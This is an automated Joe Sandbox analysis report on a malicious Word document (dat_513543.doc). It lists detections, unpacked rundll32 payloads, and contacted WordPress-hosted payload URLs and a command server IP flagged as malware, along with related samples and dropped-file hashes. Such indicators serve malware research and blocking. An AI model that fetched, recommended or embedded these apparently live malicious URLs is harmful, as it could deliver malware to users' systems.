Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
dat_513543.doc	63%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
9.2.rundll32.exe.470000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
11.2.rundll32.exe.270000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
12.2.rundll32.exe.220000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
14.2.rundll32.exe.6f0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
15.2.rundll32.exe.2b0000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
8.2.rundll32.exe.210000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
10.2.rundll32.exe.230000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
13.2.rundll32.exe.210000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
7.2.rundll32.exe.240000.1.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

Source	Detection	Scanner	Link
veterinariadrpopui.com	5%	Virustotal	Browse
wpsapk.com	1%	Virustotal	Browse
sofsuite.com	4%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
http://veterinariadrpopui.com	100%	Avira URL Cloud	malware
http://5.2.136.90/04rd/6w3hm75k6ju730vl/l0qiyvbr6/vmtc1/bd9090pvenbvbzuu/	0%	Avira URL Cloud	safe
http://veterinariadrpopui.com/content/5f18Q/	100%	Avira URL Cloud	malware
http://sofsuite.com/wp-includes/2jm3nIk/	100%	Avira URL Cloud	phishing
http://khanhhoahomnay.net/wordpress/CGMC/	100%	Avira URL Cloud	malware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	100%	Avira URL Cloud	malware
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://shop.elemenslide.com	0%	Avira URL Cloud	safe
http://khanhhoahomnay.net	0%	Avira URL Cloud	safe
http://shop.elemenslide.com/wp-content/n/	100%	Avira URL Cloud	malware
http://sofsuite.com	0%	Avira URL Cloud	safe
http://wpsapk.com	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://wpsapk.com/wp-admin/v/	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
veterinariadrpopui.com	209.59.139.39	true	true	5%, Virustotal, Browse	unknown
wpsapk.com	104.18.61.59	true	true	1%, Virustotal, Browse	unknown
sofsuite.com	104.27.144.251	true	true	4%, Virustotal, Browse	unknown
khanhhoahomnay.net	210.86.239.69	true	true		unknown
shop.elemenslide.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://5.2.136.90/04rd/6w3hm75k6ju730vl/l0qiyvbr6/vmtc1/bd9090pvenbvbzuu/	true	Avira URL Cloud: safe	unknown
http://veterinariadrpopui.com/content/5f18Q/	true	Avira URL Cloud: malware	unknown
http://sofsuite.com/wp-includes/2jm3nIk/	true	Avira URL Cloud: phishing	unknown
http://khanhhoahomnay.net/wordpress/CGMC/	true	Avira URL Cloud: malware	unknown
http://wpsapk.com/wp-admin/v/	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.windows.com/pctv.	rundll32.exe, 00000009.00000002.2108646901.00000000022B0000.00000002.00000001.sdmp	false		high
http://veterinariadrpopui.com	powershell.exe, 00000005.00000002.2112702616.0000000003B8D000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://investor.msn.com	rundll32.exe, 00000006.00000002.2110632977.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105139354.0000000001CE0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106445061.0000000001E70000.00000002.00000001.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	rundll32.exe, 00000006.00000002.2110632977.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105139354.0000000001CE0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106445061.0000000001E70000.00000002.00000001.sdmp	false		high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	rundll32.exe, 00000006.00000002.2111721751.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105906260.0000000001EC7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2107059819.0000000002057000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.hotmail.com/oe	rundll32.exe, 00000006.00000002.2110632977.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105139354.0000000001CE0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106445061.0000000001E70000.00000002.00000001.sdmp	false		high
http://www.piriform.com/ccleanerhttp://www.piriform.c	powershell.exe, 00000005.00000002.2102201796.0000000000404000.00000004.00000020.sdmp	false		high
https://gurztac.wtchevalier.com/wp-content/YzZ6YZ/	powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	powershell.exe, 00000005.00000002.2112111732.0000000003B2E000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.2112702616.0000000003B8D000.00000004.00000001.sdmp	false		high
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	rundll32.exe, 00000006.00000002.2111721751.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105906260.0000000001EC7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2107059819.0000000002057000.00000002.00000001.sdmp	false		high
http://www.icra.org/vocabulary/.	rundll32.exe, 00000006.00000002.2111721751.0000000001CF7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105906260.0000000001EC7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2107059819.0000000002057000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.	powershell.exe, 00000005.00000002.2103756353.0000000002430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107759466.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109125954.0000000002800000.00000002.00000001.sdmp	false		high
http://shop.elemenslide.com	powershell.exe, 00000005.00000002.2113413103.0000000003BC8000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://khanhhoahomnay.net	powershell.exe, 00000005.00000002.2113413103.0000000003BC8000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://shop.elemenslide.com/wp-content/n/	powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	true	Avira URL Cloud: malware	unknown
http://investor.msn.com/	rundll32.exe, 00000006.00000002.2110632977.0000000001B10000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2105139354.0000000001CE0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2106445061.0000000001E70000.00000002.00000001.sdmp	false		high
http://sofsuite.com	powershell.exe, 00000005.00000002.2112121116.0000000003B43000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://wpsapk.com	powershell.exe, 00000005.00000002.2110491399.00000000037F2000.00000004.00000001.sdmp	true	Avira URL Cloud: safe	unknown
http://www.piriform.com/ccleaner	powershell.exe, 00000005.00000002.2102201796.0000000000404000.00000004.00000020.sdmp	false		high
http://www.%s.comPA	powershell.exe, 00000005.00000002.2103756353.0000000002430000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2107759466.00000000027F0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2109125954.0000000002800000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
210.86.239.69	unknown	Viet Nam	24173	NETNAM-AS-APNetnamCompanyVN	true
209.59.139.39	unknown	United States	32244	LIQUIDWEBUS	true
104.27.144.251	unknown	United States	13335	CLOUDFLARENETUS	true
104.18.61.59	unknown	United States	13335	CLOUDFLARENETUS	true
5.2.136.90	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	true

General Information

Joe Sandbox Version:	31.0.0 Red Diamond
Analysis ID:	336623
Start date:	06.01.2021
Start time:	15:48:02
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 14s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	dat_513543.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled GSI enabled (VBA) AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winDOC@26/8@7/5
EGA Information:	Successful, ratio: 90%
HDC Information:	Successful, ratio: 91.5% (good quality ratio 88%) Quality average: 75.5% Quality standard deviation: 25.7%
HCA Information:	Successful, ratio: 92% Number of executed functions: 146 Number of non-executed functions: 90
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Found warning dialog Click Ok Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Execution Graph export aborted for target powershell.exe, PID 1692 because it is empty Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:48:40	API Interceptor	1x Sleep call for process: msg.exe modified
15:48:41	API Interceptor	63x Sleep call for process: powershell.exe modified
15:48:48	API Interceptor	889x Sleep call for process: rundll32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
210.86.239.69	DATA-480841.doc	Get hash	malicious	Browse	khanhhoahomnay.net/wordpress/CGMC/
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	khanhhoahomnay.net/wordpress/CGMC/
	pack-91089 416755919.doc	Get hash	malicious	Browse	khanhhoahomnay.net/wordpress/CGMC/
209.59.139.39	DATA-480841.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	pack-91089 416755919.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Adjunto.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	NQN0244_012021.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Scan-0767672.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	Documento-2021.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	info_39534.doc	Get hash	malicious	Browse	veterinariadrpopui.com/content/5f18Q/
	http://btxtfnereq4mf3x3q1eq1sdudvhhiurr.www4.me	Get hash	malicious	Browse	cirugiaesteticamexico.medicainspira.com/wordpress/wp-content/upgrade/i/googlephotos/album/
104.27.144.251	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	sofsuite.com/wp-includes/2jm3nIk/
	Adjunto.doc	Get hash	malicious	Browse	sofsuite.com/wp-includes/2jm3nIk/
	NQN0244_012021.doc	Get hash	malicious	Browse	sofsuite.com/wp-includes/2jm3nIk/
	Scan-0767672.doc	Get hash	malicious	Browse	sofsuite.com/wp-includes/2jm3nIk/
104.18.61.59	DATA-480841.doc	Get hash	malicious	Browse	wpsapk.com/wp-admin/v/
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	wpsapk.com/wp-admin/v/
	pack-91089 416755919.doc	Get hash	malicious	Browse	wpsapk.com/wp-admin/v/
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	wpsapk.com/wp-admin/v/
5.2.136.90	PACK.doc	Get hash	malicious	Browse	5.2.136.90/6d6v7rdk92yimvk/99aw7ok625toqmkhj7c/
	pack 2254794.doc	Get hash	malicious	Browse	5.2.136.90/76cxdz6xxj/u15u3hf6xq6us/0vtcgy/tltp48/51u1dif1fy5wlgpgf/
	DATA-480841.doc	Get hash	malicious	Browse	5.2.136.90/6tycsc/
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	5.2.136.90/gv38bn75mnjox2y/c6b9ni4/vj3ut3/kld53/bp623/r5qw7a8y6jtlf9qu/
	pack-91089 416755919.doc	Get hash	malicious	Browse	5.2.136.90/9ormjijma/sd2xibclmrp5oftlrxf/
	Adjunto.doc	Get hash	malicious	Browse	5.2.136.90/nmjn7tw17/z6mjkdfb6xb/85tf0qh6u/bqo6i0tmr9bo/
	arc-NZY886292.doc	Get hash	malicious	Browse	5.2.136.90/zpm1364ks766bq5tfgm/of4c87wiptl9gmt2iai/xi3tkrikfkjmyw07j7s/8758g9rolh/96kjwl7hgnpltacdm2/gdi8d56ispt49sa36ql/
	NQN0244_012021.doc	Get hash	malicious	Browse	5.2.136.90/xgyqftp8/ypox5kzx24gfln5utkh/ejrffzc54r5vq/itkmc/prx4/
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	5.2.136.90/tqndp5p5qacps4njp6/p6z0bktcdw7ja/i1rph/
	Scan-0767672.doc	Get hash	malicious	Browse	5.2.136.90/7hs0yieqcvglex40v9/th111ygicc1htiecx/eto0vvprampeftpmcc/
	Documento-2021.doc	Get hash	malicious	Browse	5.2.136.90/n5z35/rncfyghpt3nn9/twyyh8xn/dm5hb/
	informazioni-0501-012021.doc	Get hash	malicious	Browse	5.2.136.90/kcdo20u2bqptv6/
	rapport 40329241.doc	Get hash	malicious	Browse	5.2.136.90/6s0p53atjr9ihwygvd/svxo4o84aueyhj9v5m/5lqp30jb/g0ur1kwrzvgj3o0gmmo/dw8my2m1fzzo/
	info_39534.doc	Get hash	malicious	Browse	5.2.136.90/5ciqo/dhqbj3xw/
	Dati_012021_688_89301.doc	Get hash	malicious	Browse	5.2.136.90/l7tybna/g7nyjudv6/gf8bykzqxpzupj/wr2o0u8id88pf7dgmx3/9zupu1q7mb/wtjo6ov5niso7jo0n/
	2199212_20210105_160680.doc	Get hash	malicious	Browse	5.2.136.90/vcpu82n/rvhhoco3em4jtl/qxey084opeuhirghxzs/bm8x5w07go1ogzflbv/32imx8ryeb30/bd7tg46kn/
	ARCHIVO_FILE.doc	Get hash	malicious	Browse	5.2.136.90/ji02pdi/39rfb96opn/
	doc_X_13536.doc	Get hash	malicious	Browse	5.2.136.90/glhz448zi9act/ieva/q040/sl9198fns4q2/
	REP380501 040121.doc	Get hash	malicious	Browse	5.2.136.90/09hsu3aavqd4/8opns7c/oxp5fp7awb/
	doc-20210104-0184.doc	Get hash	malicious	Browse	5.2.136.90/78ro59myn48w9a6ku/bcgjwwwuc/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
wpsapk.com	DATA-480841.doc	Get hash	malicious	Browse	104.18.61.59
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	104.18.61.59
	pack-91089 416755919.doc	Get hash	malicious	Browse	104.18.61.59
	Adjunto.doc	Get hash	malicious	Browse	104.18.60.59
	NQN0244_012021.doc	Get hash	malicious	Browse	104.18.60.59
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	104.18.61.59
	Scan-0767672.doc	Get hash	malicious	Browse	104.18.60.59
	Documento-2021.doc	Get hash	malicious	Browse	172.67.141.14
	info_39534.doc	Get hash	malicious	Browse	172.67.141.14
veterinariadrpopui.com	DATA-480841.doc	Get hash	malicious	Browse	209.59.139.39
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	209.59.139.39
	pack-91089 416755919.doc	Get hash	malicious	Browse	209.59.139.39
	Adjunto.doc	Get hash	malicious	Browse	209.59.139.39
	NQN0244_012021.doc	Get hash	malicious	Browse	209.59.139.39
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	209.59.139.39
	Scan-0767672.doc	Get hash	malicious	Browse	209.59.139.39
	Documento-2021.doc	Get hash	malicious	Browse	209.59.139.39
	info_39534.doc	Get hash	malicious	Browse	209.59.139.39
sofsuite.com	DATA-480841.doc	Get hash	malicious	Browse	104.27.145.251
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	104.27.144.251
	pack-91089 416755919.doc	Get hash	malicious	Browse	104.27.145.251
	Adjunto.doc	Get hash	malicious	Browse	104.27.144.251
	NQN0244_012021.doc	Get hash	malicious	Browse	104.27.144.251
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	104.27.145.251
	Scan-0767672.doc	Get hash	malicious	Browse	104.27.144.251
	Documento-2021.doc	Get hash	malicious	Browse	104.27.145.251
	info_39534.doc	Get hash	malicious	Browse	172.67.158.72
khanhhoahomnay.net	DATA-480841.doc	Get hash	malicious	Browse	210.86.239.69
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	210.86.239.69
	pack-91089 416755919.doc	Get hash	malicious	Browse	210.86.239.69

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
NETNAM-AS-APNetnamCompanyVN	DATA-480841.doc	Get hash	malicious	Browse	210.86.239.69
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	210.86.239.69
	pack-91089 416755919.doc	Get hash	malicious	Browse	210.86.239.69
CLOUDFLARENETUS	https://j.mp/2MBbcFl	Get hash	malicious	Browse	172.67.147.155
	details.html	Get hash	malicious	Browse	104.16.126.175
	https://grantsvillemd.xyz/amlsbC5tY2dydWRlckB3ZXN0ZXJuc291dGhlcm4uY29t	Get hash	malicious	Browse	104.31.70.102
	https://nou.s3.amazonaws.com/index.html#a2VuLmxhbmRyeUBnb29kbWFubWZnLmNvbQ==&:459=40404	Get hash	malicious	Browse	104.16.18.94
	http://rva.fonotecanacional.gob.mx/preview-assets/css/smoothness/reports/chron_import.php?spent=1s0xppx5zxx96n&science=sun&round=hand	Get hash	malicious	Browse	104.16.18.94
	Ekz Payment.htm	Get hash	malicious	Browse	104.16.19.94
	https://antivirushub.co/mcafee/?uid=8303109807388896189&lp=https://afflat3a1.com/lnk.asp?o=9295&c=918271&a=270802&k=73f36ccc4d96e9dc2f	Get hash	malicious	Browse	104.28.26.223
	https://bit.ly/2XaOiGR	Get hash	malicious	Browse	104.16.18.94
	OVl2ydWZDb	Get hash	malicious	Browse	104.23.98.190
	spetsifikatsiya.xls	Get hash	malicious	Browse	172.67.8.238
	Shipping Document PL and BL003534.ppt	Get hash	malicious	Browse	104.18.49.20
	Inquiry-RFQ93847849-pdf.exe	Get hash	malicious	Browse	66.235.200.147
	PO20002106.exe	Get hash	malicious	Browse	104.23.99.190
	SHIPPING INVOICEpdf.exe	Get hash	malicious	Browse	172.67.187.112
	COO_TPE0269320_image2020-12-31-055841.exe	Get hash	malicious	Browse	172.67.166.210
	Payment Documents.xls	Get hash	malicious	Browse	104.22.0.232
	DATA-480841.doc	Get hash	malicious	Browse	104.18.61.59
	eTrader-0.1.0.exe	Get hash	malicious	Browse	104.23.98.190
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	104.18.61.59
	eTrader-0.1.0.exe	Get hash	malicious	Browse	104.23.99.190
LIQUIDWEBUS	https://encrypt.idnmazate.org	Get hash	malicious	Browse	67.225.177.41
	DATA-480841.doc	Get hash	malicious	Browse	209.59.139.39
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	209.59.139.39
	pack-91089 416755919.doc	Get hash	malicious	Browse	209.59.139.39
	https://securemail.bridgepointeffect.com/	Get hash	malicious	Browse	69.167.167.26
	Adjunto.doc	Get hash	malicious	Browse	209.59.139.39
	NQN0244_012021.doc	Get hash	malicious	Browse	209.59.139.39
	4560 2021 UE_9893.doc	Get hash	malicious	Browse	209.59.139.39
	Scan-0767672.doc	Get hash	malicious	Browse	209.59.139.39
	Documento-2021.doc	Get hash	malicious	Browse	209.59.139.39
	info_39534.doc	Get hash	malicious	Browse	209.59.139.39
	https://encrypt.idnmazate.org/	Get hash	malicious	Browse	67.225.177.41
	Nuevo pedido.exe	Get hash	malicious	Browse	209.188.81.142
	https://6354mortgagestammp.com/	Get hash	malicious	Browse	69.16.199.206
	rib.exe	Get hash	malicious	Browse	72.52.175.20
	https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fsecuremail.danchihosassociates.com&c=E,1,HOuENPlSucTdSUxKwjhrlo_5dPC7J6R1N-Gq03z50mu0n-SbGg9k6UcvRdnb2hWVC0JKp04hBPt2pBkJTi_IhWBa5JSs0U_QUfg3Hl_nTWTxJyTIR8N3&typo=1	Get hash	malicious	Browse	67.225.158.30
	messaggio 2912.doc	Get hash	malicious	Browse	67.227.152.97
	8415051-122020.doc	Get hash	malicious	Browse	67.227.152.97
	Mensaje 900-777687.doc	Get hash	malicious	Browse	67.227.152.97
	088-29-122020-522-0590.doc	Get hash	malicious	Browse	67.227.152.97
CLOUDFLARENETUS	https://j.mp/2MBbcFl	Get hash	malicious	Browse	172.67.147.155
	details.html	Get hash	malicious	Browse	104.16.126.175
	https://grantsvillemd.xyz/amlsbC5tY2dydWRlckB3ZXN0ZXJuc291dGhlcm4uY29t	Get hash	malicious	Browse	104.31.70.102
	https://nou.s3.amazonaws.com/index.html#a2VuLmxhbmRyeUBnb29kbWFubWZnLmNvbQ==&:459=40404	Get hash	malicious	Browse	104.16.18.94
	http://rva.fonotecanacional.gob.mx/preview-assets/css/smoothness/reports/chron_import.php?spent=1s0xppx5zxx96n&science=sun&round=hand	Get hash	malicious	Browse	104.16.18.94
	Ekz Payment.htm	Get hash	malicious	Browse	104.16.19.94
	https://antivirushub.co/mcafee/?uid=8303109807388896189&lp=https://afflat3a1.com/lnk.asp?o=9295&c=918271&a=270802&k=73f36ccc4d96e9dc2f	Get hash	malicious	Browse	104.28.26.223
	https://bit.ly/2XaOiGR	Get hash	malicious	Browse	104.16.18.94
	OVl2ydWZDb	Get hash	malicious	Browse	104.23.98.190
	spetsifikatsiya.xls	Get hash	malicious	Browse	172.67.8.238
	Shipping Document PL and BL003534.ppt	Get hash	malicious	Browse	104.18.49.20
	Inquiry-RFQ93847849-pdf.exe	Get hash	malicious	Browse	66.235.200.147
	PO20002106.exe	Get hash	malicious	Browse	104.23.99.190
	SHIPPING INVOICEpdf.exe	Get hash	malicious	Browse	172.67.187.112
	COO_TPE0269320_image2020-12-31-055841.exe	Get hash	malicious	Browse	172.67.166.210
	Payment Documents.xls	Get hash	malicious	Browse	104.22.0.232
	DATA-480841.doc	Get hash	malicious	Browse	104.18.61.59
	eTrader-0.1.0.exe	Get hash	malicious	Browse	104.23.98.190
	Documenten_9274874 8574977265.doc	Get hash	malicious	Browse	104.18.61.59
	eTrader-0.1.0.exe	Get hash	malicious	Browse	104.23.99.190

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{51D7E52E-FC7D-43F0-B5EC-EA333295AFA3}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Reputation:	high, very likely benign file
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171 Download File
Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbWwWl:sZ
MD5:	3B7B4F5326139F48EFA0AAE509E2FE58
SHA1:	209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
SHA-256:	D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
SHA-512:	C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
Malicious:	false
Preview:	........................................user.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\dat_513543.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Wed Jan 6 22:48:37 2021, length=169984, window=hide
Category:	dropped
Size (bytes):	2028
Entropy (8bit):	4.51818488179035
Encrypted:	false
SSDEEP:	24:8Jg/XTm6GFy1ezWDv3qodM7dD2Jg/XTm6GFy1ezWDv3qodM7dV:8W/XTFGFYg9oQh2W/XTFGFYg9oQ/
MD5:	3CE5CFE4F662398D7B1A360C9FF8A5F3
SHA1:	DCB2B7AD03DB5559EFE114E355D83247C298E916
SHA-256:	EFA5C2D761065254882655FFDB2CD4C69CA2DCB2C4D0B27C65FF8B43F55E96CA
SHA-512:	9BDE83CEA8B0FFF903DB3F21FA629621455AF664FDB42433F5FEF2701DF73D7E1CFD4C88D74E14F6DAB272A781C04B1D9D6D87C6CBFCD4FF0325130A1F2D45AF
Malicious:	false
Preview:	L..................F.... ...l....{..l....{.....s.................................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.....&R.. .DAT_51~1.DOC..J.......Q.y.Q.y...8.....................d.a.t._.5.1.3.5.4.3...d.o.c.......x...............-...8...[............?J......C:\Users\..#...................\\134349\Users.user\Desktop\dat_513543.doc.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.a.t._.5.1.3.5.4.3...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......134349..........D_....3N...W...9F.C...........[D_....3N...W...9F.C..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	68
Entropy (8bit):	4.232282930136185
Encrypted:	false
SSDEEP:	3:M1yHrSZ45rSmX1yHrSv:MwH845kHI
MD5:	0C21F8218D23FA877FCAD8E3CF786850
SHA1:	A70C5F8130C684B949FBF1AD5554EA3976EF5807
SHA-256:	85CC48D4CD1CDA76D1387392961FC320207FCAFCEB23A791C2FBD734F8E57325
SHA-512:	7C43C3FC4B030FE065154DC0945B88096FB42DF6377EAE109ADA3D6A04E8F535FC91562012FBDA6201B2B35052AFFE5BFE1E70756C4D7413744662154664F565
Malicious:	false
Preview:	[doc]..dat_513543.LNK=0..dat_513543.LNK=0..[doc]..dat_513543.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVy3KGcils6w7Adtln:vdsCkWthGciWfQl
MD5:	4A5DFFE330E8BBBF59615CB0C71B87BE
SHA1:	7B896C17F93ECFC9B69E84FC1EADEDD9DA550C4B
